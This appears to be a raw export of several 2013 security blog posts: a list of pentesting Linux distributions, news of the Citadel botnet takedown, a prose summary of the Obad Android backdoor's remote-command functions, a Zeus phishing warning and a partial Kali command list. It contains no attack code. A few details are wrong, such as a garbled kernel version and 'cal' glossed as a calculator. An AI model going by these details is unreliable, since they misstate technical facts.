<hr style="background-color: white; border-bottom-color: rgb(255, 255, 255); border-bottom-style: solid; border-left-width: 0px; border-right-width: 0px; border-top-color: rgb(238, 238, 238); border-top-style: solid; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin: 20px 0px;" />
<div class="clearfix" style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px;">
</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
<strong>9. Matriux Krypton.</strong><br />
<a href="http://www.concise-courses.com/security/wp-content/uploads/2012/11/matriux-krypton.png" style="color: #0088cc; text-decoration: none;"><img alt="" class="alignleft size-full wp-image-108" height="250" src="http://www.concise-courses.com/security/wp-content/uploads/2012/11/matriux-krypton.png" style="border: 0px; display: inline; float: left; height: auto; margin: 5px; max-width: 100%; vertical-align: middle;" title="matriux-krypton" width="300" /></a>This linux distro is, I believe, is the first security distribution based directly on Debian, (after WEAKERTH4N?) if I am wrong please comment below! There are 300 security tools to work, called “arsenals”. The arsenals allow for penetration testing, ethical hacking, system and network administration, security testing, vulnerability analysis, cyber forensics investigations, exploiting, cracking and data recovery. The last category, data recovery, doesn’t seem to be prevalent in the other distros.</div>
<hr style="background-color: white; border-bottom-color: rgb(255, 255, 255); border-bottom-style: solid; border-left-width: 0px; border-right-width: 0px; border-top-color: rgb(238, 238, 238); border-top-style: solid; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin: 20px 0px;" />
<div class="clearfix" style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px;">
</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
<strong>10. DEFT.</strong><br />
<a href="http://www.concise-courses.com/security/wp-content/uploads/2012/11/DEFT.png" style="color: #0088cc; text-decoration: none;"><img alt="" class="alignleft size-full wp-image-109" height="250" src="http://www.concise-courses.com/security/wp-content/uploads/2012/11/DEFT.png" style="border: 0px; display: inline; float: left; height: auto; margin: 5px; max-width: 100%; vertical-align: middle;" title="DEFT" width="300" /></a>The latest version is DEFT 7 which is based on the new Linux Kernel 3 and the DART (Digital Advanced Response Toolkit). This distro is more orientated towards Computer Forensics and uses LXDE as desktop environment and WINE for executing Windows tools under Linux. The developers, (based in Italy) hope that their distro will be used by the Military, Police, Investigators, IT Auditors and professional penetration testers. DEFT is an abbreviation for “Digital Evidence & Forensic Toolkit”</div>
<hr style="background-color: white; border-bottom-color: rgb(255, 255, 255); border-bottom-style: solid; border-left-width: 0px; border-right-width: 0px; border-top-color: rgb(238, 238, 238); border-top-style: solid; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin: 20px 0px;" />
<div class="clearfix" style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px;">
</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
<strong>11. CAINE</strong><br />
<a href="http://www.concise-courses.com/security/wp-content/uploads/2012/11/caine.png" style="color: #0088cc; text-decoration: none;"><img alt="" class="alignleft size-full wp-image-147" height="250" src="http://www.concise-courses.com/security/wp-content/uploads/2012/11/caine.png" style="border: 0px; display: inline; float: left; height: auto; margin: 5px; max-width: 100%; vertical-align: middle;" title="caine" width="300" /></a>A reader to our blog suggested to add CAINE which we duly have. CAINE Stands for Computer Aided Investigative Environment, and like many information security products and tools – it is Italian GNU/Linux live distribution. CAINE offers a comprehensive forensic environment that is organized to integrate existing software tools that are composed as software modules, all displayed within a friendly graphical interface. CAINE states to have three objectives. These are, to ensure that the distro works in an interoperable environment that supports the digital investigator during the four phases of the digital investigation. Secondly that the distro has a user friendly graphical interface and finally that it provides a semi-automated compilation of the final forensic report. As you would likely expect, CAINE is fully open-source.</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
If anyone has used this please let us know.</div>
<hr style="background-color: white; border-bottom-color: rgb(255, 255, 255); border-bottom-style: solid; border-left-width: 0px; border-right-width: 0px; border-top-color: rgb(238, 238, 238); border-top-style: solid; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin: 20px 0px;" />
<div class="clearfix" style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px;">
</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
<strong>12. Bugtraq</strong></div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
<a href="http://www.concise-courses.com/security/wp-content/uploads/2012/11/bug-traq.png" style="color: #0088cc; text-decoration: none;"><img alt="" class="alignleft size-full wp-image-148" height="250" src="http://www.concise-courses.com/security/wp-content/uploads/2012/11/bug-traq.png" style="border: 0px; display: inline; float: left; height: auto; margin: 5px; max-width: 100%; vertical-align: middle;" title="bug-traq" width="300" /></a>Bugtraq is another reader submitted pentesting distro. Based on the 26.6.38 kernel, this distro offers a really wide range of penetration and forensic tools. Like most of the others in this list, Bugtraq can hard-install of obviously run as a Live DVD or from a USB drive. Bugtraq claims to have recently configured and updated the kernel for better performance but also importantly so that it can recognize more hardware, including wireless injection patches pentesting. The team at Bugtraq seem solid because they are clearly making an effort to get the kernel to work with more hardware – something which the other distributions don’t always place enough importance.</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
Some of the special features included with Bugtraq include (as stated) an expanded range of recognition for injection wireless drivers, (i.e. not just the usual Alfa rtl8187), a patched 2.6.38 kernel and solid installation of the usual suspects: Nessus, OpenVAS, Greenbone, Nod32, Hashcat, Avira etc.</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
Unique to Bugtraq (as claimed on their site) is the ability to, or better said, ease, of deleting tracks and backdoors. Just by having read about Bugtraq I’m really glad that I can add this to the list because it just sounds like a job well done. If you are interested in any of the following pentesting and forensic categories, then do go and check out Buqtraq: Malware, Penetration Shield, Web audit, Brute force attack, Communication and Forensics Analytics, Sniffers, Virtualizations, Anonymity and Tracking, Mapping and Vulnerability detection.</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
<strong>Quick Summary:</strong> You can’t go wrong with any Ubuntu based distro. BackTrack does the job well but I guess, of course, it’s all personal – i.e. does the distro do the job for you? Every penetration tester needs a lean towards a particular tool or tool-set. Frankly they are all good, and it would be prudent to use several of these pentesting distros as live versions. For WiFi hacking then WEAKERTH4N is likely your better friend, whilst to stay within the law, use Samurai.</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
Bugtraq looks really good – the team behind it seems to have taken considerable time to tick all the boxes. Once we test it I’ll update the post.</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
Here is a list of other distros (which we think are still alive and kicking – please correct us if we are wrong).</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
<strong>Other Distro’s</strong><br />
Damn Vulnerable Linux (<strong>reader comment:</strong> more of an operating system for attacking purposes)<br />
Hakin9 (an educational and training distro that you can use to play-along with when subscribing to the Hacking Magazine Hak9)<br />
Helix<br />
nUbuntu<br />
Network Security Toolkit (NST)<br />
OWASP Labrat<br />
Frenzy<br />
grml<br />
Ophcrack<br />
FCCU<br />
OSWA Assistant<br />
Russix<br />
Chaox-NG<br />
GnackTrack<br />
Katana<br />
Securix-NSM<br />
Auditor</div>
<div style="background-color: white; color: #333333; font-family: Ubuntu, arial, sans-serif; font-size: 15px; line-height: 20px; margin-bottom: 10px;">
And here is a list of distros that, regrettably, have passed on to <strong>Linux Heaven.</strong><br />
KCPentrix<br />
Protech<br />
FIRE<br />
Arudius<br />
INSERT<br />
Local Area Security (LAS)<br />
NavynOS<br />
Operator<br />
PHLAK<br />
PLAC<br />
SENTINIX<br />
Talos<br />
ThePacketMaster<br />
Trinux<br />
WarLinux<br />
Whoppix<br />
WHAX<br />
HeX<br />
Stagos FSE<br />
SNARL</div>
Lukahttp://www.blogger.com/profile/12845576990602536643noreply@blogger.com1tag:blogger.com,1999:blog-5727431290630009200.post-14832431134540854742013-06-08T08:49:00.002-07:002013-06-08T08:50:05.459-07:00MICROSOFT AND FBI TACKLE CITADEL BANKING TROJAN<div class="separator" style="clear: both; font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZQmPuDwiLo1oitIlzC4mfaMGhtyJHtmhfqaWmCGLy3IsNOhO4kg3rhoOOw7P5l_w2NWBawowwJ1v7wbC_pZnj2vmERYMuhvE-6tAA4AMrShe582TQZujtgAPj1ZdwdH0FX_bF7vxw9Mk/s1600/FBI+take+down+$500+million+Citadel+botnet.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-decoration: none;"><br class="Apple-interchange-newline" /><span style="background-color: white;"><span style="color: black;"><img border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZQmPuDwiLo1oitIlzC4mfaMGhtyJHtmhfqaWmCGLy3IsNOhO4kg3rhoOOw7P5l_w2NWBawowwJ1v7wbC_pZnj2vmERYMuhvE-6tAA4AMrShe582TQZujtgAPj1ZdwdH0FX_bF7vxw9Mk/s400/FBI+take+down+$500+million+Citadel+botnet.jpg" style="border: 0px; margin: 0px; padding: 0px;" width="400" /></span></span></a></div>
<span style="background-color: white;"><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;"> </span><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px; text-align: center;">Microsoft is better known as a software provider than as an international crimefighter, but its recent operations against Russian cybercriminals may change some minds.</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">In a joint operation with the FBI, Microsoft yesterday (June 5) took down more than 1,000 botnets controlled by the Citadel banking Trojan.</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">Citadel is a particularly nasty banking Trojan that has targeted customers of major financial institutions, including Citigroup, JPMorgan Chase and Bank of America, among others.</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">Over the last year and a half, Citadel has cost the banks, which must reimburse losses from consumer accounts, more than $500 million, according to Reuters. (Commercial bank accounts are not always reimbursed, and many small businesses have lost millions.)</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">Banking Trojans operate by infecting Web browsers, often via a "drive-by download" from a corrupted website, although Microsoft said pirated copies of Windows were also used in this case.</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">A banking Trojan will lie dormant until the infected browser accesses an online bank account, at which point the Trojan captures the login information and passes it to a human controller, typically in Eastern Europe.</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">After being infected by Citadel malware, computers also often get drafted into a botnet.</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">Botnets allow criminals to leverage remote computers for spam attacks and malware distribution; they also provide criminals with the means to steal financial information and fill their own coffers.</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">To spearhead its counterattack, Microsoft filed a civil lawsuit in North Carolina yesterday against an online criminal known only as "Aquabox," as well as 81 other unnamed conspirators.</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">The lawsuit, in all likelihood, will not accomplish much, since Aquabox is unlikely to show up in his own defense.</span></span><br />
<div style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px;">
<span style="background-color: white;"><br />Furthermore, Aquabox is probably located in Russia or Ukraine. To this end, Microsoft filed the suit in both English and Russian.<br /><br />A bank hacker could operate from anywhere in the world, but Citadel's targets are telling. The malware has stolen from companies all across North America, Europe, Asia and Australia, but has bypassed Russian and Ukranian institutions. It's assumed by Western experts that Russian police will mostly ignore domestic cybercriminals who attack only foreign targets.<br /><br />Microsoft and the FBI collaborated in a venture called "Operation b54," which successfully took down 1,000 of Citadel's 1,400 botnets by seizing command-and-control servers worldwide,<br /><br />About 455 of the seized servers were in the U.S. Russian cybercriminals often use assumed names to rent server space from American hosting companies.<br /><br />While the Citadel operation will recover, Richard Boscovich of the Microsoft Digital Crimes Unit points out that Operation b54 has bought infected users time to repair their systems.<br /><br />"Citadel blocked victims' access to many legitimate anti-virus/anti-malware sites, making it so people may not have been able to easily remove this threat from their computer," Boscovich wrote in an official Microsoft blog posting.</span></div>
<div style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVC8GDFWwgTkKeqdV6thQlLZOWZFbU8p7VnqW3A7h-iofVLEL-T6Q6qhCoO0LPexcyeSjxuwzzdzbfcBCU3G42I0qwzr_KmtrtnaIVh03N74GX-dcW3zVZAOeElMYJ6e_jS4ZzAghDTzA/s1600/FBI+take+down+%2524500+million+Citadel+botnet.png" imageanchor="1" style="background-color: white; margin-left: 1em; margin-right: 1em; text-decoration: none;"><span style="color: black;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVC8GDFWwgTkKeqdV6thQlLZOWZFbU8p7VnqW3A7h-iofVLEL-T6Q6qhCoO0LPexcyeSjxuwzzdzbfcBCU3G42I0qwzr_KmtrtnaIVh03N74GX-dcW3zVZAOeElMYJ6e_jS4ZzAghDTzA/s1600/FBI+take+down+%2524500+million+Citadel+botnet.png" style="border: 0px; margin: 0px; padding: 0px;" /></span></a></div>
<div style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px;">
<span style="background-color: white;">Now that users can remove the harmful software from their machines, Citadel's convalescence may prove slow and anemic.</span></div>
<div style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px;">
<span style="background-color: white;"><br />Since cybercrime happens across international borders, Boscovich also hopes that Operation b54 will set the tenor for future counterattacks.<br /><br />"Operation b54 serves as a real world example of how public-private cooperation can work effectively within the judicial system, and how 20th century legal precedent and common law principles dating back hundreds of years can be effectively applied toward 21st century cybersecurity issues," Boscovich wrote.<br /><br />This is not the first time Microsoft has tackled cybercriminal botnets.<br /><br />In March 2012, Microsoft brought down 800 botnets created by the <a href="http://www.technewsdaily.com/7632-microsoft-disrupts-zeus-malware.html" style="text-decoration: none;">Zeus </a>banking Trojan but under the control of different criminal groups.<br /><br />Whereas Zeus is used by many different criminal groups, Citadel is used by only one. Because of that, Microsoft and the FBI may be able to figure out Aquabox's identity and put a stop to Citadel once and for all.<br /><br />Cybercrime is generally profitable because it's easy to do and hard to get caught, but if Operation b54 is any indication, that could change soon.</span></div>
Lukahttp://www.blogger.com/profile/12845576990602536643noreply@blogger.com4tag:blogger.com,1999:blog-5727431290630009200.post-45845015793818500092013-06-08T03:23:00.002-07:002013-06-08T03:23:37.107-07:00MOST SOPHISTICATED ANDROID MALWARE EVER DETECTED<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFdlTCxguZpv3851Y6NnT9wr1XZ6ylAKXnwXxwz-G3coV3Ta_OWUPK4vvApf1URBf4SLtThtL9xhW2W9jhHB8q1jlMAOVOPrdzojFmDcRxB7u4UqeWK5HjILiMAWsxv6WPd6or_yTOte8/s640/Android+Malware.png" /><br />
<span style="background-color: #f3f3f3;"><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;">A new piece of Android malware has been discovered by security researchers at Kaspersky Labs. That by itself wouldn't be big news, but this Trojan does things no other malicious app has done. It exploits multiple vulnerabilities, blocks uninstall attempts, attempts to gain root access, and can execute a host of remote commands. Backdoor.AndroidOS.Obad.a, as it has been dubbed, is the most sophisticated piece of Android malware ever seen.</span><br style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;" /></span><br />
<div style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px;">
<span style="background-color: #f3f3f3;">There are two previously unknown Android vulnerabilities exploited by Obad. The malware installer contains a modified AndroidManifest.xml file, which is a part of every Android apps. The first big vulnerability is in the processing of this file by the system – it shouldn't be processed at all, but the app installs just fine. Once Obad is on a device it uses a second Android exploit to gain extended Administrator access. The Android Administrator feature allows apps to read notifications and perform other advanced operations (a lot of security apps use it). When this command is executed, Obad can not be unsinstalled and it doesn't even show up in the list of Administrator-approved apps.<br /><b><br />When it is in place, Obad starts probing the system and checking for internet and root access. It slurps up data and reaches out to its command and control servers. Here is the full list of command functions described by Kaspersky:<br />Send text message. Parameters contain number and text. Replies are deleted.<br />PING.<br />Receive account balance via USSD.<br />Act as proxy (send specified data to specified address, and communicate the response).<br />Connect to specified address (clicker).<br />Download a file from the server and install it.<br />Send a list of applications installed on the smartphone to the server.<br />Send information about an installed application specified by the C&C server.<br />Send the user’s contact data to the server.<br />Remote Shell. Executes commands in the console, as specified by the cybercriminal.<br />Send a file to all detected Bluetooth devices.</b></span></div>
<div style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px;">
<b style="background-color: #f3f3f3;"><br /></b></div>
<div class="separator" style="clear: both; font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0TlSYJkNXZTvbwiHR8k86p99XX-kVeO6c0CsAM3DXtAduZfZokjmnNuy0pUMxzu6e4Ch-sa8llfVrmadLhHkI8ni4EMMjpQDRwCYTQRVuzp0OcOs358mvZ2AStCEJ-kTjexhI78tdV2k/s1600/Android+Malware+(1).png" imageanchor="1" style="background-color: #f3f3f3; margin-left: 1em; margin-right: 1em; text-decoration: none;"><span style="color: black;"><img border="0" height="451" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0TlSYJkNXZTvbwiHR8k86p99XX-kVeO6c0CsAM3DXtAduZfZokjmnNuy0pUMxzu6e4Ch-sa8llfVrmadLhHkI8ni4EMMjpQDRwCYTQRVuzp0OcOs358mvZ2AStCEJ-kTjexhI78tdV2k/s640/Android+Malware+(1).png" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></span></a></div>
<div style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px;">
<span style="background-color: #f3f3f3;"><b><br /></b>When it arrives on a device most of the package is encrypted, and some of the most important components are not decrypted until it gains internet access. This makes analysis and detection much more difficult. The Trojan doesn't even have an interface – it works entirely in background mode. The level of sophistication and new exploits in this one piece of malware looks more like a Windows virus than other Android Trojans. Backdoor.AndroidOS.Obad.a is still very limited in scope, but it is floating around alternative app stores and fishy websites.</span></div>
<div style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px;">
<span style="background-color: #f3f3f3;"><br /></span></div>
<div class="separator" style="clear: both; font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPe5364L4Du2gyZIR0qHkNRHjCfg2aXqfQxTLl4NSHZbZnQKo95-0JS6eTCmXrULQhALj5JeR-UFxXL-dyNwINOXt2_zECW23iqtev0Sib79uvfNh6I8YxQE13sC_1fmf_Q5LtMS2sQeA/s1600/Android_Malware_Engine_Mohit_Kumar_Hacker.png" imageanchor="1" style="background-color: #f3f3f3; margin-left: 1em; margin-right: 1em; text-decoration: none;"><span style="color: black;"><img border="0" height="399" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPe5364L4Du2gyZIR0qHkNRHjCfg2aXqfQxTLl4NSHZbZnQKo95-0JS6eTCmXrULQhALj5JeR-UFxXL-dyNwINOXt2_zECW23iqtev0Sib79uvfNh6I8YxQE13sC_1fmf_Q5LtMS2sQeA/s640/Android_Malware_Engine_Mohit_Kumar_Hacker.png" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></span></a></div>
Lukahttp://www.blogger.com/profile/12845576990602536643noreply@blogger.com1tag:blogger.com,1999:blog-5727431290630009200.post-17526228407360757812013-06-06T08:58:00.003-07:002013-06-06T08:58:55.324-07:00 Warning ! Facebook virus Zeus targets bank accounts <br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4lnB7xejsswa1Vp3KqlujgkAu3lOkvqf1rKA6poHzOPnIcTGClRMnQAhGR88ncSrE2ndNZivMGAwQogVmQ4VGERf65U2Zs0gBM3fbfKUah7WmiNR18c_H0Ew3oBWFkNoHLS2GJmYY7Dk/s1600/Facebook+virus+Zeus+targets+bank+accounts.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="214" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4lnB7xejsswa1Vp3KqlujgkAu3lOkvqf1rKA6poHzOPnIcTGClRMnQAhGR88ncSrE2ndNZivMGAwQogVmQ4VGERf65U2Zs0gBM3fbfKUah7WmiNR18c_H0Ew3oBWFkNoHLS2GJmYY7Dk/s320/Facebook+virus+Zeus+targets+bank+accounts.png" width="320" /></a>A six-year-old virus that drains bank accounts is thriving on Facebook, <a href="http://bits.blogs.nytimes.com/2013/06/03/malware-that-drains-your-bank-account-thriving-on-facebook/">reports Nicole Perlroth of The New York Times</a>.<br />
<div>
<br /><div>
<b>The virus is spread through phishing messages.</b><br /><br />When someone has been phished, their account will automatically send messages or links to a large number of their friends.<br /><br />These messages or links are usually ads telling friends to check out videos or products. Don't click them.<br /><br />Facebook
is aware of the problem but it isn't taking the matter nearly as
seriously as it should be, says Eric Feinberg, founder of the advocacy
group Fans Against Kounterfeit Enterprise (FAKE).<br /><br />Feinberg told The NYTimes, “[Facebook isn't] listening ... we need oversight on this.”<br /><br /><a href="http://en.wikipedia.org/wiki/Zeus_%28Trojan_horse%29">The virus is called Zeus</a>.
It's a special type of Trojan horse that has already infected millions
of computers. Zeus works by remaining dormant on your computer until you
log into your bank account. Once you're in it steals your password and
drains your account.<br /><br />Zeus targets Windows machines. It does not
work on Mac OS X or Linux. The only real way to protect yourself from it
is to make sure you only click links that come from trusted sources. <br /><br />The
virus is sophisticated too. Sometimes it can even replace your bank's
website with its own page in order to get even more information like
your social security number so that it can be sold on the black market.<br /><br />Zeus
has been around since 2007 and evidence shows that it is only getting
more active. The virus is being hosted from computers controlled by a
Russian criminal gang that has been linked to online crimes ranging from
malware and identity theft all the way to child pornography.</div>
</div>
Lukahttp://www.blogger.com/profile/12845576990602536643noreply@blogger.com1tag:blogger.com,1999:blog-5727431290630009200.post-65250149771166827152013-06-05T11:38:00.003-07:002013-06-05T11:38:50.921-07:00Kali BASIC COMMANDS YOU MUST KNOW<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigl7WLmBvRpnl5UlafscC36uv2Ti9d288RQt9hmY-nFIeK14MblbQkXmhfdflO6F7GikvelrBbwVkrfOXpVjDoOnT3H0y8otB6lTxoWEz3MSezU9vX9iRxuuPirCnkQGXiY3eE8Ggk7rY/s1600/5a5h11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigl7WLmBvRpnl5UlafscC36uv2Ti9d288RQt9hmY-nFIeK14MblbQkXmhfdflO6F7GikvelrBbwVkrfOXpVjDoOnT3H0y8otB6lTxoWEz3MSezU9vX9iRxuuPirCnkQGXiY3eE8Ggk7rY/s320/5a5h11.png" width="320" /></a></div>
<span style="background-color: white;"><span style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px;"> </span><span style="font-family: Arial, Helvetica, sans-serif; font-size: large; line-height: 18px;"><b>File Operations</b></span></span><br />
<div style="font-family: verdana, arial, times, 'Trebuchet MS', sans-serif; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px;">
<span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif; font-size: large;"><br /></span></span><div style="margin: 0px; padding: 0px;">
<span style="background-color: white;">pwd <b> Print Name Of Current/Working Directory</b><br />cd <b>Changing The Working Directory</b><br />cp <b>Copy Files Or Directory</b><br />rm <b>Remove Files And Directory</b><br />ls <b> List Of Directory Contents</b><br />mkdir <b>Make Directory</b><br />cat <b>Concatenate Files And Print On Standard Output</b><br />mv <b>Move Files</b><br />chmod <b>Change Files Permissions</b></span><div style="margin: 0px; padding: 0px;">
<span style="font-family: 'Droid Serif', arial, serif;"><span style="background-color: white; font-size: 14px; line-height: 22px;"><i><br /></i></span></span></div>
<div style="margin: 0px; padding: 0px;">
<span style="background-color: white;"><span style="font-family: 'Droid Serif', arial, serif;"><span style="font-size: 14px; line-height: 22px;"><i> </i></span></span><span style="font-family: Arial, Helvetica, sans-serif; font-size: large;"><b>Know Your System</b></span><span style="font-family: 'Droid Serif', arial, serif;"><span style="font-size: 14px; line-height: 22px;"><i><br /></i></span></span></span><div style="margin: 0px; padding: 0px;">
<span style="background-color: white;"> </span></div>
<span style="background-color: white;">uname <b>Print System Information</b><br />who <b> Show Who Is Logged On</b><br />cal <b>Displays Calculator</b><br />date <b>Print System Date And Time</b><br />df <b>Report File System Disk Space Usage</b><br />du <b>Estimate File Space Usage</b><br />ps <b>Displays Information Of Current Active Processes</b><br />kill <b>Allows To Kills Process</b><br />clear <b>Clear The Terminal Screen</b><br />cat /proc/cpuinfo <b>Cpuinfo Display CPU Information</b><br />cat /proc/meminfo <b>Display Memory Information</b></span><h2 style="border: 0px; font-size: 12px; font-weight: normal; margin: 0px 0px 0.75em; outline: none medium; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;"><br /></span><div style="margin: 0px; padding: 0px;">
<span style="background-color: white;"> <span style="font-family: Arial, Helvetica, sans-serif; font-size: large;">Compression</span></span></div>
</h2>
</div>
<div style="margin: 0px; padding: 0px;">
<span style="background-color: white;"><br /></span></div>
<div style="margin: 0px; padding: 0px;">
<span style="background-color: white;">tar <b>To Store And Extract Files From An Archive File Known As Tar File</b></span></div>
<div style="margin: 0px; padding: 0px;">
